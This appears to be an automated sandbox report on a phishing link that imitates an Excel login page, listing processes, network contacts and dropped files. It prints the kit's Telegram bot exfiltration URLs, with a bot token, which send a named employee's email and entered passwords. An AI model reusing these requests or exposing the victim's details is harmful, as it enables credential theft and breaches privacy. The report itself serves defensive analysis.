Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2260,i,6116481441488140002,9378863470170372530,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2260,i,6116481441488140002,9378863470170372530,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
Ingress Tool Transfer
Scheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.com0%Avira URL Cloudsafe
https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.com100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://phil-health-uk.glitch.me/100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
phil-health-uk.glitch.me
44.217.167.231
truetrue
    unknown
    www.google.co.th
    142.250.185.99
    truefalse
      high
      www.google.com
      172.217.18.4
      truefalse
        high
        api.ipify.org
        172.67.74.152
        truefalse
          high
          hyundaielevator.com
          13.209.60.147
          truefalse
            unknown
            upload.wikimedia.org
            185.15.59.240
            truefalse
              high
              api.telegram.org
              149.154.167.220
              truefalse
                high
                dns.google
                8.8.4.4
                truefalse
                  high
                  cdn.glitch.global
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    http://phil-health-uk.glitch.me/#changyeol.choi@hyundaielevator.comtrue
                      unknown
                      http://phil-health-uk.glitch.me/true
                      • Avira URL Cloud: phishing
                      unknown
                      https://api.telegram.org/bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage?chat_id=1739269434&text=GODLY%20LOGS%0AEmail%3A%20changyeol.choi%40hyundaielevator.com%0APassword%3A%20)oRtTKtS4%24h4IW%0AIP%3A%208.46.123.189%0ABrowser%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36%0ADate%20and%20Time%3A%201%2F5%2F2025%2C%2010%3A56%3A57%20PM%0AMX%20Records%3A%2010%20mailin.hyundaigroup.com.false
                        high
                        https://www.google.co.th/amp/phil-health-uk.glitch.me/false
                          high
                          https://upload.wikimedia.org/wikipedia/commons/thumb/7/73/Microsoft_Excel_2013-2019_logo.svg/1200px-Microsoft_Excel_2013-2019_logo.svg.pngfalse
                            high
                            https://dns.google/resolve?name=hyundaielevator.com&type=MXfalse
                              high
                              https://api.ipify.org/?format=jsonfalse
                                high
                                https://api.telegram.org/bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage?chat_id=1739269434&text=GODLY%20LOGS%0AEmail%3A%20changyeol.choi%40hyundaielevator.com%0APassword%3A%20d)pC%26w%2C%3F%23FiHs0%0AIP%3A%208.46.123.189%0ABrowser%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36%0ADate%20and%20Time%3A%201%2F5%2F2025%2C%2010%3A56%3A33%20PM%0AMX%20Records%3A%2010%20mailin.hyundaigroup.com.false
                                  high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  142.250.185.99
                                  www.google.co.thUnited States
                                  15169GOOGLEUSfalse
                                  13.209.60.147
                                  hyundaielevator.comUnited States
                                  16509AMAZON-02USfalse
                                  172.217.18.4
                                  www.google.comUnited States
                                  15169GOOGLEUSfalse
                                  8.8.4.4
                                  dns.googleUnited States
                                  15169GOOGLEUSfalse
                                  149.154.167.220
                                  api.telegram.orgUnited Kingdom
                                  62041TELEGRAMRUfalse
                                  239.255.255.250
                                  unknownReserved
                                  unknownunknownfalse
                                  185.15.59.240
                                  upload.wikimedia.orgNetherlands
                                  14907WIKIMEDIAUSfalse
                                  44.217.167.231
                                  phil-health-uk.glitch.meUnited States
                                  14618AMAZON-AESUStrue
                                  172.67.74.152
                                  api.ipify.orgUnited States
                                  13335CLOUDFLARENETUSfalse
                                  IP
                                  192.168.2.4
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1584644
                                  Start date and time:2025-01-06 04:55:18 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 11s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:browseurl.jbs
                                  Sample URL:https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.com
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:8
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal88.phis.troj.win@23/28@28/10
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 172.217.16.195, 142.250.186.174, 74.125.206.84, 216.58.206.78, 142.250.186.46, 142.250.185.202, 142.250.185.138, 172.217.18.10, 172.217.16.138, 142.250.186.138, 142.250.185.106, 142.250.181.234, 142.250.185.234, 216.58.212.138, 142.250.186.170, 142.250.74.202, 142.250.184.202, 142.250.186.74, 142.250.185.170, 216.58.206.42, 142.250.186.42, 151.101.2.132, 151.101.66.132, 151.101.130.132, 151.101.194.132, 172.217.18.106, 142.250.186.106, 172.217.23.106, 216.58.212.170, 2.22.50.144, 192.229.221.95, 172.217.16.206, 142.250.185.78, 142.250.185.142, 142.250.186.67, 142.250.185.206, 216.58.212.174, 23.56.254.164, 172.202.163.200, 13.107.246.45
                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, j.sni.global.fastly.net, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, firebasestorage.googleapis.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.com
                                  No simulations
                                  No context
                                  No context
                                  No context
                                  No context
                                  No context
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:JSON data
                                  Category:downloaded
                                  Size (bytes):21
                                  Entropy (8bit):3.594465636961452
                                  Encrypted:false
                                  SSDEEP:3:YMb1gXME2Y:YMeX32Y
                                  MD5:909AD59B6307B0CD8BFE7961D4B98778
                                  SHA1:49F8111D613317EA86C6A45CD608DC96B1C8451B
                                  SHA-256:FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
                                  SHA-512:8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
                                  Malicious:false
                                  Reputation:low
                                  URL:https://api.ipify.org/?format=json
                                  Preview:{"ip":"8.46.123.189"}
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:JSON data
                                  Category:dropped
                                  Size (bytes):767
                                  Entropy (8bit):5.341163765871021
                                  Encrypted:false
                                  SSDEEP:12:YKOHu/Pz7EZUp0Sa3IjN+WEWozIgIukyB9iTsRB2DOexWb2RKJFtHCeZAVSM+/4w:YKOHIwq0Saw+WBgIukyB95n2DOIRwi4x
                                  MD5:A9449E5076F9687EA24CAAD9E7629C52
                                  SHA1:0F69775FAF927069F4106A22D9F5FCDCDD425C47
                                  SHA-256:4FDA82C8E34447D894A45EBE40B20CB4E30E3D3A8B323B0CB73C60627BE3C94A
                                  SHA-512:47B77750ECCAFE0E57944640BE047586B11E815CE4A4DE66962475C1449C6C25139B5ED334AA7541F8CEE377A45092FD50C2E5131E2F80EB52C2238EFDEEF0ED
                                  Malicious:false
                                  Reputation:low
                                  Preview:{"ok":true,"result":{"message_id":23542,"from":{"id":7051308130,"is_bot":true,"first_name":"Bigbig","username":"sipisapabot"},"chat":{"id":1739269434,"first_name":"L","last_name":"Moore","username":"L_moore","type":"private"},"date":1736135796,"text":"GODLY LOGS\nEmail: changyeol.choi@hyundaielevator.com\nPassword: d)pC&w,?#FiHs0\nIP: 8.46.123.189\nBrowser: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36\nDate and Time: 1/5/2025, 10:56:33 PM\nMX Records: 10 mailin.hyundaigroup.com.","entities":[{"offset":18,"length":34,"type":"email"},{"offset":71,"length":6,"type":"hashtag"},{"offset":82,"length":12,"type":"url"},{"offset":192,"length":9,"type":"url"},{"offset":268,"length":23,"type":"url"}]}}
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                  Category:downloaded
                                  Size (bytes):15075
                                  Entropy (8bit):7.559993150300236
                                  Encrypted:false
                                  SSDEEP:192:nSAnaaaaaaaaaaaaaauedmYu5NRSKI+diJjvx4BTzS/BNG16cySA6Ktbl4dgT1f8:SDRi1vI+/zclAjGgT1MaKou5
                                  MD5:61978706A03558A3219BE7B86FB0A356
                                  SHA1:862F7BA0D926E08DDF2F7E8DDEA92AB3E0848200
                                  SHA-256:F8E92461B2A90EBD69B47090D17CCBCCB4FA917A2B1E8B6C7A5B8D20AC033004
                                  SHA-512:AA6C48775D8CCDDB1B6D88C64AC18063B32C22C3BF3EC3B64B6F544D2769421A51A23B25624214B547E5AF7781444949EC712F4D493AB372413D1218970490D5
                                  Malicious:false
                                  Reputation:low
                                  URL:https://firebasestorage.googleapis.com/v0/b/png-images-481bb.appspot.com/o/98845_15_excel_icon.png?alt=media&token=cb28188b-9c21-482b-b418-cf68b6847d08
                                  Preview:.PNG........IHDR..............x......pHYs............... .IDATx...w.TU......=.Y....0&..D..P1G.&u . .T2....(..E@$K.9g.:...M.w...U.P.{.Z....{..aW.......#.9...n...................D.... .........8.....A....."...p...........D.... .........8.....A....."...p...........D.... .........8.....A....."...p...........D.... .........8.....A....."...p...........D.... .........8.....A....."...p...........D.... .........8.....A....."...p...........D.... .........8.....A....."...p...........D.... .........8.....A....."...p...........D.... .........8.....A....."...p...........D.... .........8.....A....."...p...........D.... .........8.....A....."...p...........D.... .........8.....A....."...p...........D.... .........8.....A....."...p...........D.... .........8.....A....."...p...........D.... .........8....V..R46[..rR.I9..IY...R.ss.2Z...^V.yG...}%.../.W.jE..Y....*.#mkI....kCZH...9.d...a.vY.o........@....crV.j%...ojXZo...-...........V..Gw.nS...../[...#{%-..dee..x2Y^..K..Q...,.V.jK^.......
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 920x924, components 3
                                  Category:dropped
                                  Size (bytes):46406
                                  Entropy (8bit):7.330741027079575
                                  Encrypted:false
                                  SSDEEP:768:gMu6m9SYlkxYSGsYoSkkkkkkkkkkkkkkkkkkkkxVwln8+yn5uC5PkgmKBV7i2Ptk:g/6G9SGNkkkkkkkkkkkkkkkkkkkkxVI1
                                  MD5:BAAF4EEC93103596CBD0865DCCAB5DF8
                                  SHA1:85C40D1E1695C94C3A3AE92DB309DC5B37143B1F
                                  SHA-256:D55C5F4B1F89E8092DFB019C5030D17C1766D7E0903C1545D5D5454C0F8FC180
                                  SHA-512:D55401922109E056F12EF816208A30BFD151B1282E997F0C85C4BD9AC75314592CFA434109686F3FFF70653BE3A613379D0BD2E6F53870173B0E3DCA9EB1808A
                                  Malicious:false
                                  Reputation:low
                                  Preview:......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....9<.......?......t...>..4d....Q@....3FO...%...>..4d....Q@....3FO...%...>..4d....Q@....3FO...%...>..4d....Q@....3FO...%...>..4d....Q@....3FO...%...>..4d....Q@....3FO...%...>..4d....Q@....3FO...%...>..4d....Q@....3FO...%...>..4d....Q@....3FO...%...>..4d....Q@....3FO...%...>..4d....Q@....3FO...%...>..4d....Q@....3FO...%...>..4d....Q@....3FO...%...>..4d....Q@....3FO...%...>..4
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 1280 x 720, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):378651
                                  Entropy (8bit):7.9879880973743225
                                  Encrypted:false
                                  SSDEEP:6144:vKRbWU6TtHSizSzEiV7H8FfozhAArmaquJV4rDbrtlZJXdx2T2VOQWUPCdpp3:yJr6ThSizIHV7H8FQOJqVcDbr3Z5dTOz
                                  MD5:81DAF68A1EB02C88B79926DC4145A700
                                  SHA1:19DCBA2DB2614F39B720F3155F3EB61C864417E1
                                  SHA-256:2FBE4A3BF2CE50B04EFEC59E3930C76299E5ABB43881917A08F74B18D864C847
                                  SHA-512:C8DCCE8660E5ECC0CA6EFF96074205DF072C23ACC26B37B7690639AD60AFFAD21A010DA18BECAB5B3A4A2F1DF837106295F572C8AA96D473FF6E615ABA2C6C5C
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR..............}.V....sBIT....|.d... .IDATx^.]..]5.>....uC+."...-.]|./Vdq.e..}a.E.b.).@.".H..5..N.....N.;w.q.-I....99....|.$..}.r..#....x.Z......|#..K.4u....q......N..7......W...!&&F.bb%...8...E..HVan..}.G.#....x....r.\...k5..`\e.J...4e&9U..w0...3..U.q.71.Veh*...5.V..+....a...6...:F.....c...V..<bJ."..M...8u.yLG.a.A.1.gE^&...|4.IT./.l...9T'{ea.~.F.8.+.*.>.........)-..8.Y..xp.f...b. ...6B...Ki..X....P.....J..r....3....:.K`...Z.B.......Q(......J\...A.....Dq....:...v.Dhj.q..n.+^nx......e..4.l|we~ee.O..y.<....@..+tw.jw.VEz.'G..Njm.".4..*..?.....UN.X.;..kX..x....0...~a):...E..aQ[..E...!@....../......$.q..Wx..A..D....G.#.p...c.....1.[3..../.1.\I~...{,<9..@...K.2G.1..8r..RZju.7#3..*.)`......iSX..S9..%...I8..p......c.-%...J...Z.L9L..Q...WV.k1(....d.gx.x....7L.U'......:X.m....G9.......h1%...%<.m.i0.B..'...<%A....oJ.H.....h.g..c]..U.....Rr..m.l.....6..l....q.#<3/D.w..j.3..[.#......a.....\.I@Fe9.?u...$.......z*Q...=...;.`%.)..(...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:JSON data
                                  Category:downloaded
                                  Size (bytes):767
                                  Entropy (8bit):5.3403908793673365
                                  Encrypted:false
                                  SSDEEP:12:YKOHu/P4EZUp0Sa3IjN+WEWoc2gIukyB9iTsRB2DOexWb2RKJFtHCeZAVSM+/4cx:YKOHPwq0Saw+WR2gIukyB95n2DOIRwiq
                                  MD5:7D894357F398B0D50C4CF49E94A453C7
                                  SHA1:889506B0B8045F4EEBA23CF81CCA2E5BA1790BCA
                                  SHA-256:BCC2A7B01DDD41627951CF2A0B9EC7680F48689DB311924552DDE32B044839DA
                                  SHA-512:ED6F50F1F6C8E77A4AF6DE4F24D8FD10BE8837CB1B016B61D9ACDB9B926C1D9EB5D75EFFE62EE8FF22BA573F65AD14691B3BD60E6BC36E4744FFBBEC6F39EA89
                                  Malicious:false
                                  Reputation:low
                                  URL:https://api.telegram.org/bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage?chat_id=1739269434&text=GODLY%20LOGS%0AEmail%3A%20changyeol.choi%40hyundaielevator.com%0APassword%3A%20d)pC%26w%2C%3F%23FiHs0%0AIP%3A%208.46.123.189%0ABrowser%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36%0ADate%20and%20Time%3A%201%2F5%2F2025%2C%2010%3A56%3A33%20PM%0AMX%20Records%3A%2010%20mailin.hyundaigroup.com.
                                  Preview:{"ok":true,"result":{"message_id":23541,"from":{"id":7051308130,"is_bot":true,"first_name":"Bigbig","username":"sipisapabot"},"chat":{"id":1739269434,"first_name":"L","last_name":"Moore","username":"L_moore","type":"private"},"date":1736135795,"text":"GODLY LOGS\nEmail: changyeol.choi@hyundaielevator.com\nPassword: d)pC&w,?#FiHs0\nIP: 8.46.123.189\nBrowser: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36\nDate and Time: 1/5/2025, 10:56:33 PM\nMX Records: 10 mailin.hyundaigroup.com.","entities":[{"offset":18,"length":34,"type":"email"},{"offset":71,"length":6,"type":"hashtag"},{"offset":82,"length":12,"type":"url"},{"offset":192,"length":9,"type":"url"},{"offset":268,"length":23,"type":"url"}]}}
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:JSON data
                                  Category:downloaded
                                  Size (bytes):264
                                  Entropy (8bit):4.88608105373858
                                  Encrypted:false
                                  SSDEEP:6:Y2iNAwNem0Lx2MALg98E7/n5rh8E7/grhnnfRBmABLHY:Y2J2Vg99z5rh9zQ3/0
                                  MD5:364E7BF99E7C7FA0518122BB2747CF1B
                                  SHA1:7B763987752D9CF1A0CAEE0511B3C79923E9ED50
                                  SHA-256:720423ECE3D8D781694690EBF7F0FBA002E4371882281AFA3DFA9CB4004103DF
                                  SHA-512:65D1FC3443F9B4A2E42E17FB6A3431633F2B9712AFDCAF7966DCB132BAD6DCECA4B825CF2E3226A1ACFCA7119A3939494F4CE049B7F89780CC9D44DB241D63E3
                                  Malicious:false
                                  Reputation:low
                                  URL:https://dns.google/resolve?name=hyundaielevator.com&type=MX
                                  Preview:{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"hyundaielevator.com.","type":15}],"Answer":[{"name":"hyundaielevator.com.","type":15,"TTL":3600,"data":"10 mailin.hyundaigroup.com."}],"Comment":"Response from 205.251.196.251."}
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 1200 x 1133, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):28424
                                  Entropy (8bit):7.516047275979373
                                  Encrypted:false
                                  SSDEEP:768:/Ha4p721VYBaU8FAcxUfeypDY1Bx5XBOWplXI:S4p72UaUyxUztABp+
                                  MD5:75B3ED4A1D236D18CE66E74D99117B3A
                                  SHA1:EC6F09AD42F4041B05C7D5150E6DFBED091596F3
                                  SHA-256:CDB0338DB9A82E2DABBA97147C1DCC7E99286B40E84BBD5AB174F094BFD93CA1
                                  SHA-512:4147A11963A83FCF267DE7CE0C515656D3E32840377AB97B46254E00AA61E1A335B902E098FAA86E33B0433BFAF528B529E50C3A0D864C27BE5FD6356025F676
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.......m.....E..>....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME....."3s-PO..n.IDATx...w.......>g.... *. .".(..l J.5...M..M6&&....~...]....]....%..f7.l.-&..;V.(...4.m.|.?.+e...9.....)g...p..,........Y..../.y].Y}d.....#.Z...6....e..*...7......E.....#........m....._.GT7..j....|S...*.......h._N....zpd..#...gY^.........E.................y....0.E....+...$`.....zS}...b!.....D]^..=r........@.iJ..".......d...@....Q].W......(.?.UQ.K......P.........m-T}.Q...-...t*..D.X..%b..j.......(W...@bF.`T..]z..,....<...8b...*....4...@'....]W-^...CUT}.....*........V.Y.OdB.....X..mD...h....@3}%T..>"..Q.r...EA...h[....V.u.q5.....r..<.W-]2"...*......X.@..Z....*....X.@....zo....y.Gdu.E}...~.P.......(;.~0.OC......F....Y......:...(Y[.U.Y.P..PF.,. yC...C...)T..T&...H..BU.1.F.U...J...:.....7.t...P.u.....W........hG[.U.....?....m....V...#.F.n..7.EV...X....pF....'`..M..PU...w....YD.R....,....rF.~.1...*7....J......P..D..*..R!`.@....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 1200 x 1133, 8-bit/color RGBA, non-interlaced
                                  Category:downloaded
                                  Size (bytes):28424
                                  Entropy (8bit):7.516047275979373
                                  Encrypted:false
                                  SSDEEP:768:/Ha4p721VYBaU8FAcxUfeypDY1Bx5XBOWplXI:S4p72UaUyxUztABp+
                                  MD5:75B3ED4A1D236D18CE66E74D99117B3A
                                  SHA1:EC6F09AD42F4041B05C7D5150E6DFBED091596F3
                                  SHA-256:CDB0338DB9A82E2DABBA97147C1DCC7E99286B40E84BBD5AB174F094BFD93CA1
                                  SHA-512:4147A11963A83FCF267DE7CE0C515656D3E32840377AB97B46254E00AA61E1A335B902E098FAA86E33B0433BFAF528B529E50C3A0D864C27BE5FD6356025F676
                                  Malicious:false
                                  Reputation:low
                                  URL:https://upload.wikimedia.org/wikipedia/commons/thumb/7/73/Microsoft_Excel_2013-2019_logo.svg/1200px-Microsoft_Excel_2013-2019_logo.svg.png
                                  Preview:.PNG........IHDR.......m.....E..>....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME....."3s-PO..n.IDATx...w.......>g.... *. .".(..l J.5...M..M6&&....~...]....]....%..f7.l.-&..;V.(...4.m.|.?.+e...9.....)g...p..,........Y..../.y].Y}d.....#.Z...6....e..*...7......E.....#........m....._.GT7..j....|S...*.......h._N....zpd..#...gY^.........E.................y....0.E....+...$`.....zS}...b!.....D]^..=r........@.iJ..".......d...@....Q].W......(.?.UQ.K......P.........m-T}.Q...-...t*..D.X..%b..j.......(W...@bF.`T..]z..,....<...8b...*....4...@'....]W-^...CUT}.....*........V.Y.OdB.....X..mD...h....@3}%T..>"..Q.r...EA...h[....V.u.q5.....r..<.W-]2"...*......X.@..Z....*....X.@....zo....y.Gdu.E}...~.P.......(;.~0.OC......F....Y......:...(Y[.U.Y.P..PF.,. yC...C...)T..T&...H..BU.1.F.U...J...:.....7.t...P.u.....W........hG[.U.....?....m....V...#.F.n..7.EV...X....pF....'`..M..PU...w....YD.R....,....rF.~.1...*7....J......P..D..*..R!`.@....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
